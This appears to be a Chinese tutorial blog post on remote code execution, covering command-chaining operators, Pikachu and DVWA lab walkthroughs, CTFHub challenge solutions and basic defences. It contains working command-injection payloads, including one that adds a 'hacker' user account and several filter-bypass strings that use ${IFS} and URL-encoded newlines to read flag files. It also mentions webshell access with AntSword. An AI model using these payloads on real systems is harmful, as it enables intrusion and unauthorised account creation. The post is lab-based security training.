首页 > 其他分享 >9-远程代码执行渗透与防御

9-远程代码执行渗透与防御

时间:2024-12-08 15:10:05浏览次数:3  
标签:127.0 命令 渗透 IFS cat 0.1 代码执行 txt 远程

1、什么是远程代码执行

RCE漏洞是因为提供了命令执行的接口

1.1 漏洞危害

  • 获取服务器权限
  • 获取敏感数据文件
  • 写入恶意文件getshell
  • 植入木马病毒勒索软件等

2、RCE涉及函数


3、靶场案例

3.1 Windows命令拼接符号

符号 含义 示例
&& 左边的命令执行成功,右边的才执行 ping 127.0.0.1 && echo 'hello'
& 简单的拼接,不依赖前面的结果 ping 1111 & echo 'hello'
| 上一条命令的输出,作为下一条命令的参数 netstat -ano | findstr 3306
|| 左边的命令执行失败,右边的才会执行 ping baidu.com || ping baidu.net

3.2 Linux命令拼接符号

符号 含义 示例
; 没有任何逻辑关系的连接符
&& 左边的命令执行成功,右边的才执行 cp 1.txt 2.txt && cat 2.txt
| 上一条命令的输出,作为下一条命令的参数 netstat -an | grep 3306
|| 左边的命令执行失败,右边的才会执行 cat 3.txt || cat 2.txt
& 任务后台执行,与nohup命令功能差不多 java -jar test.jar > log.txt &

3.3 Pikachu靶场

3.1 exec "ping"

127.0.0.1 & ipconfig

3.2 exec "evel"

phpinfo();
system('ipconfig');

3.4 DVWA靶场

3.4.1 Low

127.0.0.1 & net user hacker /add

3.4.2 Medium

127.0.0.1 & ipconfig

3.4.3 High

过滤了'| '但是后面有空格
127.0.0.1|ipconfig

4、CTF题目(CTFHub)

4.1 eval执行

中国蚁剑连接,密码cmd

4.2 命令注入

127.0.0.1;cat 104731889012324.php|base64
再去网站进行base64解码

4.3 过滤cat

127.0.0.1;less flag_166202473811029.php|base64
绕过:tac从最后一行倒序显示、more根据窗口大小一页页的显示、less和more类似,但是优点是可以往前翻页,而且可以进行搜索字符、head只显示头几行、tail只显示最后几行、nl类似于cat -n显示时输出行号、tailf类似于tail -f

4.4 过滤空格

127.0.0.1;cat${IFS}flag_415086426367.php|base64
绕过:使用${IFS}、%09、<、>、<>、{,}、%20、IFS$9

4.5 过滤目录分隔符

127.0.0.1;cd flag_is_here;cat flag_281272110315443.php|base64

4.6 过滤运算符

没过滤到分号
127.0.0.1;cat 127.0.0.1;cat flag_44302103221895.php
然后右键查看网页源码

4.7 综合过滤练习

绕过:空格=${IFS}、flag=通配符f***、cat=more(less)
在地址栏输入:URL编码(%0a回车、%0d换行)

地址栏:ip=127.0.0.1%0Acd${IFS}f_is_here%0Amore${IFS}f_18329157039374.php

5、RCE防御措施

1、开源框架,升级到最新版本
2、尽量不要使用命令执行的函数
3、如果必须使用,需要做白名单处理
4、用正则表达式对用户输入的内容进行处理
5、使用WAF

标签:127.0,命令,渗透,IFS,cat,0.1,代码执行,txt,远程
From: https://www.cnblogs.com/monster-hang/p/18593412

相关文章

  • rsync+tls 远程数据同步加密传输(Rsync+tls Remote Data SynChronization Encrypted Tr
     ......
  • 设置Windows Server2019单网卡服务器的RAS远程访问,以实现L2TP或PPTP方式的专用网络连
    虚专网络(xPN)用于安全地在本地计算机和远程服务器之间创建数据隧道。在WindowsServer2019上,您可以利用远程访问服务配置xPN以向连接的客户端提供网络访问,并允许连接的设备安全地通信。本文介绍如何使用路由和远程访问功能将全新的WindowsServer2019设置为IPS......
  • 渗透测试AI:深入探讨人工智能系统的安全
      随着人工智能(AI)技术的飞速发展,AI系统在各个领域的应用越来越广泛,从自动驾驶汽车到智能家居,再到复杂的企业决策支持系统。然而,随着这些系统的普及,它们面临的安全威胁也在不断增加。本文将深入探讨AI系统的渗透测试,分享如何评估和增强AI系统的安全性。  AI系统的安全......
  • 内网渗透——NC隧道_网络隧道
    目录1.隧道定义2.NC2.1.环境搭建2.2.实验步骤2.2.1正向连接2.2.2反向连接1.隧道定义什么是隧道?隧道是一种绕过端口屏蔽的通信方式常见的隧道网络层:IPV6、imcp、gre隧道传输成:tcp、udp、常规端口转发应用层:ssh、http、https、dns隧道2.NCNCNetcat(简称NC......
  • mysql常见渗透命令
    语法格式:Example:向dvwa数据库下的guestbook数据表插入数据insertinto表名(字段1,字段2,.......)values(值1,值2,.......);insertintoguestbook(comment,name)values('welcome','web17');一个网站涉及到向数据库修改数据的功能有:修改个人信息等。语法格式:注:where条件可......
  • 【域渗透】 域内密码喷洒详解
    简介域内密码喷洒(PasswoerdSpraying)一般和域内用户名枚举一起使用在Kerberos协议认证的AS-REQ阶段,在密码正确和密码错误两种情况下,AS-REP的返回包不一样。所以可以利用这一点对域内用户名进行密码喷洒攻击。如果目标域设置了用户锁定策略,可以提高爆破成功率域内密码喷洒工具K......
  • 【域渗透】域用户枚举详解
    简介域内用户名枚举可以在没有域内有效凭据的情况下,枚举出来域内存在的用户名,并对其进行密码喷洒攻击,以此获得域内的有效凭据在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户状态分别为用户存在且启用、用户存在但禁用、用户不存在时,AS-REP包各不相同,可以利用......
  • 域渗透提权:HTB--Administrator
    文章目录靶机信息域环境初步信息收集与权限验证FTP登录尝试SMB枚举尝试WinRM登录olivia域用户枚举获取Michael权限BloodHound提取域信息GenericAll获取Benjamin权限ForceChangePasswordftp登录benjamin获取Emily权限pwsafe+hashcat获取Ethan权限获取管理员(Admin......
  • #渗透测试#SRC漏洞挖掘#红蓝攻防#黑客工具之Burp Suite介绍06-暴力破解与验证码识别
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。                             ......
  • 随时随地掌控数据:如何使用手机APP远程访问飞牛云NAS
    ......